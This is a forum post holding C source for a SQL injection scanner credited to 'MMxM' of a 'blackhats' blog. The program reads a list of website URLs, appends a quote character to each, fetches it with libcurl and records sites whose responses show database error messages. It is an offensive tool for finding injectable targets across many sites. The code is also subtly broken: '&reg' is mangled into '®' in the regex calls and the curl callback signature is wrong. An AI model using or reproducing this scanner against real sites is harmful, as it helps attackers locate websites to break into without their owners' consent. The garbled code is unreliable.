- Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <regex.h>
#include <curl/curl.h>
/*
* [ http://the-blackhats.blogspot.com ]
* Coder: MMxM
* $ gcc sqli.c -o sqli -lcurl
*
*/
char line[200];
int salvar(){
printf("\033[1;32m[+]\033[0m Vulneravel\n");
FILE *arq;
if((arq = fopen("SQLinjection.txt","a+")) == NULL){
printf("\033[1;31m[-]\033[0m Erro ao salvar site\n");
return(1);
} else {
fprintf(arq,"%s\n",line);
fclose(arq);
}
return(0);
}
void sqli(char *body){
regex_t reg;
if (regcomp(® , "mysql_fetch_array|MySQL server version|You have an error in your SQL syntax|Syntax error converting the nvarchar value|Unclosed|SQL Server error|JET",REG_EXTENDED|REG_NOSUB|REG_ICASE) != 0) {
fprintf(stderr,"\033[1;31m[-]\033[0m Erro no regex\n");
exit(1);
}
if ((regexec(®, body, 0, (regmatch_t *)NULL, 0)) == 0)
salvar();
else
printf("\033[1;31m[-]\033[0m Nao vulneravel\n");
}
int main(int argc, char *argv[]){
if( argc != 2 ) {
fprintf(stderr,"\n\033[1;32m[+]\033[0m SQLi scanner by MMxM\n\033[1;32m[+]\033[0m Modo de uso: %s <lista-de-sites>\n\n",argv[0]);
exit(1);
}
FILE *wl;
char *result;
unsigned int len;
wl = fopen(argv[1], "rt");
if (wl == NULL){
fprintf(stderr, "\n\033[1;31m[-]\033[0m Erro ao ler o arquivo: %s\n\n",argv[1]);
exit(1);
}
while (!feof(wl)){
result = fgets(line, 100, wl);
if (result){
len = strlen(line);
if (line[len - 1] == '\n')
line[len - 1] = '\0';
printf("\033[1;34m[*]\033[0m %s\n",line);
strcat(line,"'");
CURL *curl;
CURLcode res;
curl = curl_easy_init();
if(curl) {
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 15);
curl_easy_setopt(curl, CURLOPT_URL, line);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, sqli);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
}
}
fclose(wl);
fprintf(stdout,"\n\033[1;32m[+]\033[0m 100%% Complete\n\n");
exit(0);
}
Participe do fórum, é rápido e fácil